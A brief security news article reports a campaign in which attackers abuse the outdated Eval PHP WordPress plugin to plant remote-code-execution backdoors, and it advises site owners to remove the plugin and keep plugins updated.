A recent report from Sucuri has revealed that threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign. The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code pages and posts of WordPress sites that's then executed every time the posts are opened in a web browser. While Eval PHP has never received an update in 11 years, statistics gathered by WordPress show that it's installed on over 8,000 websites, with the number of downloads skyrocketing from one or two on average since September 2022 to 6,988 on March 30, 2023. On April 23, 2023, alone, it was downloaded 2,140 times. The plugin has racked up 23,110 downloads over the past seven days. GoDaddy-owned Sucuri said it observed some infected websites' databases injected with malicious code into the "wp_posts" table, which stores a site's posts, pages, and navigation menu information. The requests originate from three different IP addresses based in Russia. "This code is quite simple: It uses the file_put_contents function to create a PHP script into the docroot of the website with the specified remote code execution backdoor," security researcher Ben Martin said. The Eval PHP plugin has been a popular tool for WordPress users for a while now, but it seems that it's being used for malicious purposes by some threat actors. The plugin allows for PHP code to be inserted into WordPress posts and pages, which is then executed every time the post is loaded in a web browser. While the plugin is outdated and has not been updated in over 11 years, it is still installed on over 8,000 WordPress websites. The malicious code that has been injected into the websites' databases is designed to create a PHP script in the website's root directory that can be used to remotely execute code. The requests originate from three IP addresses based in Russia. This is a serious issue that WordPress users need to be aware of. If you have the Eval PHP plugin installed on your website, it's important to remove it immediately. Keep your plugins and themes up to date to avoid falling victim to these kinds of attacks.
top of page
bottom of page